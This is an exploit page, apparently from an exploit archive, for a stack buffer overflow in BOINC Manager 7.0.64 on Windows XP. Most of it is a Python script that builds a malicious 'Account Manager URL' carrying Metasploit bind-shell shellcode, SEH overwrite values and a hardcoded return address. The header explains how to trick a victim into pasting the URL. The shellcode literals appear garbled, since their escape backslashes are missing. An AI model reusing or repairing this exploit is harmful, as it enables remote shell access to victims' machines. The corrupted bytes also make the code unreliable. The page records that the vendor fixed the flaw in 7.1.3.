Home / exploits BOINC Manager 7.0.64 Buffer Overflow
Posted on 03 June 2013
# Exploit Title: BOINC Manager 7.0.64 Field stack based buffer overflow
# Date: 26.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://boinc.berkeley.edu/
# Software Link: http://boinc.berkeley.edu/dl/boinc_7.0.64_windows_intelx86.exe
# Version: 7.0.64 for Windows
# Tested on: Windows XP SP3 Eng (32bits)
#
#
#BOINC 7.0.64 Windows x86 (used by Seti@HOME) Manager Field stack based buffer overflow - SEH based
#
#BOINC is a program that lets you donate your idle computer time to science projects like
#SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others.
#
#In order to exploit the vulnerability the attacker must convince the victim to use the very long URL as Account Manager URL.
#This URL is generated by the exploit into the exploit.txt file. If it doesn't work the first time, give it one more try.
#The victim must follow:
#
#Add project -> Use account manager -> Account Manager URL
#
#As with all Field BOF the severity is rather low but hey watch the movie and read below
#
#http://www.youtube.com/watch?v=H9Hz8OPWjtM&feature=youtu.be
#
#The developer team @ berkeley.edu was informed about the issue and released the BOINC 7.1.3 version including the fix within a week timeframe.
# Generates exploit.txt: one over-long string meant to be entered as the
# "Account Manager URL" of BOINC Manager 7.0.64 (see the header comment;
# the header records the fix as BOINC 7.1.3, so upgrading is the mitigation).
#
# NOTE(review): the string literals below appear garbled by extraction and
# are left byte-identical; the script as shown does not reproduce the
# original PoC.
#
# Metasploit pipeline recorded by the author as the origin of the encoded
# string assigned to `shellcode`:
#windows/shell/bind_tcp EXITFUNC=thread LPORT=31337 R | msfencode -e x86/alpha_upper -t c
shellcode = (
    "x89xe6xdbxdfxd9x76xf4x5ex56x59x49x49x49x49x43"
    "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
    "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
    "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
    "x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx49x35x50"
    "x33x30x35x50x55x30x4cx49x4ax45x56x51x4ex32x35"
    "x34x4cx4bx51x42x30x30x4cx4bx31x42x44x4cx4cx4b"
    "x56x32x32x34x4cx4bx43x42x56x48x54x4fx4fx47x50"
    "x4ax57x56x36x51x4bx4fx36x51x39x50x4ex4cx47x4c"
    "x33x51x33x4cx53x32x46x4cx47x50x39x51x38x4fx44"
    "x4dx45x51x4fx37x4dx32x4cx30x46x32x31x47x4cx4b"
    "x46x32x42x30x4cx4bx30x42x47x4cx55x51x58x50x4c"
    "x4bx31x50x34x38x4dx55x39x50x33x44x51x5ax55x51"
    "x4ex30x50x50x4cx4bx30x48x52x38x4cx4bx56x38x51"
    "x30x35x51x49x43x4dx33x47x4cx37x39x4cx4bx56x54"
    "x4cx4bx55x51x4ex36x46x51x4bx4fx30x31x39x50x4e"
    "x4cx49x51x38x4fx44x4dx45x51x48x47x56x58x4dx30"
    "x44x35x5ax54x55x53x53x4dx4bx48x57x4bx43x4dx46"
    "x44x43x45x4dx32x46x38x4cx4bx56x38x56x44x43x31"
    "x4ex33x35x36x4cx4bx54x4cx50x4bx4cx4bx30x58x45"
    "x4cx35x51x58x53x4cx4bx53x34x4cx4bx35x51x38x50"
    "x4bx39x51x54x56x44x37x54x51x4bx51x4bx33x51x56"
    "x39x31x4ax50x51x4bx4fx4dx30x46x38x51x4fx30x5a"
    "x4cx4bx42x32x5ax4bx4dx56x31x4dx45x38x47x43x57"
    "x42x45x50x33x30x45x38x54x37x54x33x46x52x31x4f"
    "x31x44x52x48x30x4cx32x57x57x56x53x37x4bx4fx4e"
    "x35x4fx48x5ax30x35x51x35x50x53x30x47x59x38x44"
    "x30x54x36x30x53x58x51x39x4bx30x32x4bx43x30x4b"
    "x4fx39x45x36x30x36x30x36x30x50x50x51x50x46x30"
    "x47x30x56x30x42x48x4bx5ax54x4fx59x4fx4bx50x4b"
    "x4fx59x45x4ax37x36x51x49x4bx51x43x53x58x43x32"
    "x33x30x33x4ax55x39x4dx59x4ax46x52x4ax42x30x36"
    "x36x30x57x42x48x38x42x59x4bx50x37x53x57x4bx4f"
    "x39x45x30x53x50x57x55x38x4ex57x4ax49x47x48x4b"
    "x4fx4bx4fx59x45x46x33x56x33x50x57x52x48x43x44"
    "x5ax4cx47x4bx4dx31x4bx4fx38x55x30x57x4dx47x42"
    "x48x42x55x42x4ex30x4dx35x31x4bx4fx39x45x32x4a"
    "x53x30x43x5ax34x44x36x36x56x37x42x48x35x52x58"
    "x59x49x58x51x4fx4bx4fx39x45x4cx4bx36x56x32x4a"
    "x57x30x52x48x33x30x32x30x43x30x55x50x56x36x42"
    "x4ax55x50x43x58x50x58x39x34x56x33x4dx35x4bx4f"
    "x39x45x4ax33x56x33x43x5ax35x50x46x36x46x33x50"
    "x57x42x48x43x32x49x49x58x48x31x4fx4bx4fx58x55"
    "x45x51x58x43x51x39x4fx36x4cx45x5ax56x42x55x5a"
    "x4cx58x43x41x41")
# Prefix of the generated string; everything else is appended after it.
urlstart="http://boinc.unex.es/extremadurathome?longurl="
#Pre and Post - play with them to make them look like a valid long URL (some nice examples from google apps are out there)
# Filler placed before the nseh/seh values (length fixed by the author).
pre="C"*(1292-46)
nseh="xEBx06x43x43"
#XP sp 3 32bit Eng 0x018f1d3a : popad # call ebp | {PAGE_READWRITE} space outside of loaded modules to bypass safeseh
# Defender note: the address above is specific to the single OS build named
# in the header (Windows XP SP3 Eng, 32-bit); the header records that the
# vendor shipped a fix in BOINC 7.1.3.
NOP="x43x43"
seh="x3ax1dx8fx01"
# Trailing filler.
post="C"*5000
# Final string, concatenated in the order the author chose:
# prefix, filler, nseh, seh, NOP pad, shellcode, trailing filler.
buffer = urlstart + pre + nseh + seh + NOP + shellcode + post
print(buffer)
# Write the same string to exploit.txt in the current working directory.
# (The name `file` shadows a Python 2 builtin; harmless in a script this small.)
file = open('exploit.txt','w')
file.write(buffer)
file.close()
